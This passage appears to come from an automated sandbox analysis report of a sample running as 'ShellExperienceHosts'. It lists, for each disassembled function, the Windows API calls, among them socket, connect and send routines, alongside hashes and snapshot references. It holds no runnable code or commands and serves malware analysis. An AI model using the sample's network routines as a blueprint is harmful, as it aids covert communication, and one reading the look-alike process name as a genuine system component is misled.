                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02234594
                                                                            • SwitchToThread.KERNEL32 ref: 022345AE
                                                                            • SetEvent.KERNEL32(?), ref: 022345F7
                                                                            • CloseHandle.KERNEL32(?), ref: 0223461B
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 0223463F
                                                                            • SetEvent.KERNEL32(?), ref: 0223465D
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02234668
                                                                            • WSACloseEvent.WS2_32(?), ref: 02234676
                                                                            • shutdown.WS2_32(?,00000001), ref: 0223468A
                                                                            • closesocket.WS2_32(?), ref: 02234694
                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 022346CD
                                                                            • SetLastError.KERNEL32(000005B4), ref: 022346E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Event$CloseErrorExchangeInterlockedLastThread$CompareCurrentHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 1063552937-0
                                                                            • Opcode ID: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                            • Instruction ID: ae2a658c4aa2cd8592c2991cb37d8d0e2c6d4fd6aa31908e47eb0c2d2ab1689a
                                                                            • Opcode Fuzzy Hash: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                            • Instruction Fuzzy Hash: 7251B2B1620722EFD726EFA4C888BA9B775FF08705F148155E5018BA98C775E5A0CFD0
                                                                            Function 6C70299B Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 347windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7029A5
                                                                            • GetClientRect.USER32(?,?), ref: 6C7029C3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7029FC
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C702A51
                                                                            • CreateDIBSection.GDI32(?,?), ref: 6C702AC3
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C702AFC
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C702B2F
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C702B97
                                                                            • GetWindowRect.USER32(?,?), ref: 6C702C06
                                                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C702D56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Create$Section$CompatibleRect$BitmapClientH_prolog3_Window
                                                                            • String ID: (
                                                                            • API String ID: 2918208214-3887548279
                                                                            • Opcode ID: 33bc6e1f6737fc9dbefd210d006893ec8366580beddeb61dea8caba5269ad688
                                                                            • Instruction ID: ba382eb56348dd3b6073d7376927f592f4a1aaa552f6465223f1edd4abad5013
                                                                            • Opcode Fuzzy Hash: 33bc6e1f6737fc9dbefd210d006893ec8366580beddeb61dea8caba5269ad688
                                                                            • Instruction Fuzzy Hash: E3D120B2A00619EFDF15CFA8CA889EDBBB9FF08304F10412AE519A7614DB30AD55CF54
                                                                            Function 100036F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 10003710
                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10003749
                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 10003766
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 10003779
                                                                            • WSACreateEvent.WS2_32 ref: 1000377B
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 1000378D
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 10003799
                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 100037B8
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 100037C4
                                                                            • gethostbyname.WS2_32(00000000), ref: 100037D2
                                                                            • htons.WS2_32(?), ref: 100037F8
                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 10003816
                                                                            • connect.WS2_32(?,?,00000010), ref: 1000382B
                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 1000383A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            • API String ID: 1455939504-0
                                                                            • Opcode ID: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                            • Instruction ID: 3f7f27d39b3a29da93cc6ce51bc3e722b1ee51b6efc1866e7789f3871d2ad327
                                                                            • Opcode Fuzzy Hash: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                            • Instruction Fuzzy Hash: E74160B1A40205ABE711DBA4CC89F6FB7B8EB48711F108619FA159B2D0DA71A904CB60
                                                                            Function 6C72AA0F Relevance: 19.8, APIs: 13, Instructions: 265windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C72AA16
                                                                            • CreatePopupMenu.USER32 ref: 6C72AA4F
                                                                            • AppendMenuW.USER32(00000000,?,?,?), ref: 6C72AB1D
                                                                            • AppendMenuW.USER32(00000000,?,00000000,-00000010), ref: 6C72AB93
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72AB9F
                                                                            • AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 6C72ABC6
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72ABDE
                                                                            • SetMenuDefaultItem.USER32(00000000,?,00000000,00000000), ref: 6C72AC12
                                                                            • IsWindow.USER32(?), ref: 6C72AC5E
                                                                            • IsWindow.USER32(?), ref: 6C72AD19
                                                                            • InflateRect.USER32(?,?,?), ref: 6C72AD3C
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C72AD4E
                                                                            • UpdateWindow.USER32(?), ref: 6C72AD5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$AppendWindow$ErrorLastRect$CreateDefaultH_prolog3InflateInvalidateItemPopupUpdate
                                                                            • String ID:
                                                                            • API String ID: 2999842293-0
                                                                            • Opcode ID: a94959ab6db976de527c4c4e25d401479dccad6a5b20bff5468a1f435daaa972
                                                                            • Instruction ID: 1fa5cef80a2d04c6e8feb3f4de69717ef2115ec4a1dee691964205f2825d6fc6
                                                                            • Opcode Fuzzy Hash: a94959ab6db976de527c4c4e25d401479dccad6a5b20bff5468a1f435daaa972
                                                                            • Instruction Fuzzy Hash: C6A1CD71A01205DFDF10CF64CA88BAE77B1BF49328F144179E816AB791DB38AD05CBA0
                                                                            Function 6C724DF3 Relevance: 19.7, APIs: 13, Instructions: 215COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C724DFD
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 6C724E3B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C724E7A
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724E9D
                                                                            • GetObjectW.GDI32(?,00000054,?), ref: 6C724EEA
                                                                            • CreateDIBSection.GDI32(?,?), ref: 6C724F4C
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724F86
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724F9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Create$CompatibleSelect$H_prolog3_Section
                                                                            • String ID:
                                                                            • API String ID: 1338481308-0
                                                                            • Opcode ID: 1adbd339161c63c6205553fe5e2fc93f9f2a7dfb68081cb158a6a4ba11fc74f5
                                                                            • Instruction ID: ce7035e0ba196f75a570ca6c38ea4c8a691e3cdda9a431c3e5a4678f2411daea
                                                                            • Opcode Fuzzy Hash: 1adbd339161c63c6205553fe5e2fc93f9f2a7dfb68081cb158a6a4ba11fc74f5
                                                                            • Instruction Fuzzy Hash: 0CA13970A00615DFEB65CF64CD84B9AB7B5BF09304F1081A9E85DE7651EB30AE89CF60
                                                                            Function 6C7BA9D2 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 233COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7BA9D9
                                                                            • EqualRect.USER32(?,?), ref: 6C7BAA03
                                                                            • MonitorFromPoint.USER32(?,00000000,00000002), ref: 6C7BAB7D
                                                                            • GetMonitorInfoW.USER32(00000000), ref: 6C7BAB84
                                                                              • Part of subcall function 6C6E2190: SelectObject.GDI32(?,00000000), ref: 6C6E21B0
                                                                              • Part of subcall function 6C6E2190: SelectObject.GDI32(?,00000000), ref: 6C6E21C6
                                                                              • Part of subcall function 6C6FAE84: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 6C6FAE99
                                                                            • CopyRect.USER32(00000000,?), ref: 6C7BAB96
                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000004,6C8F37B0,?,?,?,6C70CE98,00000210), ref: 6C7BAC54
                                                                            • UpdateWindow.USER32(00000000), ref: 6C7BAC5D
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 6C7BAC6F
                                                                            • SetCursor.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6C7BAC76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CursorMonitorObjectSelect$CopyEqualExtentFromH_prolog3_InfoInvalidateLoadPointPoint32TextUpdateWindow
                                                                            • String ID: (
                                                                            • API String ID: 3592845343-3887548279
                                                                            • Opcode ID: d250131bf369e3f55f2eb477b081c80e77fa42454f1498e6ad8673b6e752c098
                                                                            • Instruction ID: fad1cf24cb9c34ee05cb5adddc33e2d474abca7aaf485c6b2b8a2c8ddb171e0a
                                                                            • Opcode Fuzzy Hash: d250131bf369e3f55f2eb477b081c80e77fa42454f1498e6ad8673b6e752c098
                                                                            • Instruction Fuzzy Hash: F2917371A0020A9FDF00DFA8CA48ADE77B5FF49318F148129E915BB644DB70AD45CFA4
                                                                            Function 6C708E8F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 199windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C708E99
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                              • Part of subcall function 6C70C950: GetStockObject.GDI32(00000011), ref: 6C70C95F
                                                                              • Part of subcall function 6C70C950: SelectObject.GDI32(?,?), ref: 6C70C971
                                                                            • GetTextMetricsW.GDI32(?,?), ref: 6C708ED3
                                                                            • GetClientRect.USER32(00000000,00000000), ref: 6C708EFA
                                                                            • GetStockObject.GDI32(00000011), ref: 6C708F40
                                                                            • SendMessageW.USER32(?,00000030,?,00000000), ref: 6C708F4E
                                                                            • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6C708FC4
                                                                            • SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6C708FFE
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C709037
                                                                            • GetSystemMetrics.USER32(00000015), ref: 6C70909A
                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000014), ref: 6C709133
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$MessageSend$MetricsSelectStock$ClientH_prolog3H_prolog3_RectRedrawSystemTextWindow
                                                                            • String ID: (>
                                                                            • API String ID: 591413167-2014128029
                                                                            • Opcode ID: 9407bb7289892f0a7fd409e0740ca610c03e318059f19c78a1e373b62c8487c1
                                                                            • Instruction ID: 56c776a2ef7bf45c6a89b2a11478e4b1b2a3201c38c213696005b7cb2212f624
                                                                            • Opcode Fuzzy Hash: 9407bb7289892f0a7fd409e0740ca610c03e318059f19c78a1e373b62c8487c1
                                                                            • Instruction Fuzzy Hash: A1818A70B002149FDF159F64C998BEE77B6BF49309F1801B8ED0AAB396DB71A905CB50
                                                                            Function 6C718D1F Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718D26
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: %TsMFCToolBarParameters$CommandsUsage$LargeIcons$MFCToolBars$MenuAnimation$MenuShadows$RecentlyUsedMenus$ShortcutKeys$ShowAllMenusAfterDelay$Tooltips
                                                                            • API String ID: 431132790-4024198107
                                                                            • Opcode ID: 2b24ee2222d811197a92fb0f39a1d093d934463bf9d11dc5f77e1b23cd8df176
                                                                            • Instruction ID: 7cbe8b58e4b2cce13ab1868f838f55989e133b6368f2ff2cbcef0d9951073fa4
                                                                            • Opcode Fuzzy Hash: 2b24ee2222d811197a92fb0f39a1d093d934463bf9d11dc5f77e1b23cd8df176
                                                                            • Instruction Fuzzy Hash: 9D5183717002059FDF149F64CA84EBD7BB6AF89348B150A78E412EBB45CB34E909DB91
                                                                            Function 6C718F00 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718F07
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: %TsMFCToolBarParameters$CommandsUsage$LargeIcons$MFCToolBars$MenuAnimation$MenuShadows$RecentlyUsedMenus$ShortcutKeys$ShowAllMenusAfterDelay$Tooltips
                                                                            • API String ID: 431132790-4024198107
                                                                            • Opcode ID: 0cd3bc2aec289d4922ea1557a37c767e9cfdff2208e6b66421f850941e4c5628
                                                                            • Instruction ID: cc22ae2605283666afa2df3621adad37ea8eafdd2e17058250f536d586bb807e
                                                                            • Opcode Fuzzy Hash: 0cd3bc2aec289d4922ea1557a37c767e9cfdff2208e6b66421f850941e4c5628
                                                                            • Instruction Fuzzy Hash: 74518C71B002069FDF109BA4C984DBD7772AFCA3487190938E812ABB95CB36DC06DB95
                                                                            Function 6C7BE928 Relevance: 18.2, APIs: 12, Instructions: 172windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C7BEB3B: LoadCursorW.USER32(00000000,00007F8B), ref: 6C7BEB53
                                                                              • Part of subcall function 6C7BEB3B: LoadCursorW.USER32(?,00007901), ref: 6C7BEB70
                                                                            • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 6C7BE95E
                                                                            • PostMessageW.USER32(?,00000111,0000E145,?), ref: 6C7BE9DA
                                                                            • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 6C7BE9FF
                                                                            • GetCursorPos.USER32(?), ref: 6C7BEA19
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6C7BEA45
                                                                            • ReleaseCapture.USER32 ref: 6C7BEA9C
                                                                            • SetCapture.USER32(?), ref: 6C7BEAA5
                                                                            • ReleaseCapture.USER32 ref: 6C7BEAB1
                                                                            • SendMessageW.USER32(?,00000362,?,00000000), ref: 6C7BEAC3
                                                                            • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 6C7BEB03
                                                                            • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C7BEB30
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                                            • String ID:
                                                                            • API String ID: 291007519-0
                                                                            • Opcode ID: c46ef60ab7614f70ab228c1716905c117b2e87d848301fcb194b641b0cf337f2
                                                                            • Instruction ID: 40b2c2adcc257f144a5f40a942c4742af5cfbfc7fdf4a530c268b8aefc9282c5
                                                                            • Opcode Fuzzy Hash: c46ef60ab7614f70ab228c1716905c117b2e87d848301fcb194b641b0cf337f2
                                                                            • Instruction Fuzzy Hash: 60514E71A00219EBDF119F65C989EAE7B79FF8A705F1001B9F916AB795C730A900CB90
                                                                            Function 022336C7 Relevance: 18.1, APIs: 12, Instructions: 141networkstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 022336E7
                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02233720
                                                                            • WSACreateEvent.WS2_32 ref: 02233752
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 02233764
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 02233770
                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 0223378F
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 0223379B
                                                                            • gethostbyname.WS2_32(00000000), ref: 022337A9
                                                                            • htons.WS2_32(?), ref: 022337CF
                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 022337ED
                                                                            • connect.WS2_32(?,?,00000010), ref: 02233802
                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 02233811
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            • API String ID: 1463362053-0
                                                                            • Opcode ID: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                            • Instruction ID: f6f2473cb8a4d828b928b55227818bde9a7a3c946174ef070c15d72a4d661bdc
                                                                            • Opcode Fuzzy Hash: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                            • Instruction Fuzzy Hash: 5D417CB1A10205ABE721DBA4CC89F7EB7B8FB48711F108519FA119A2D0D771A904CBA4
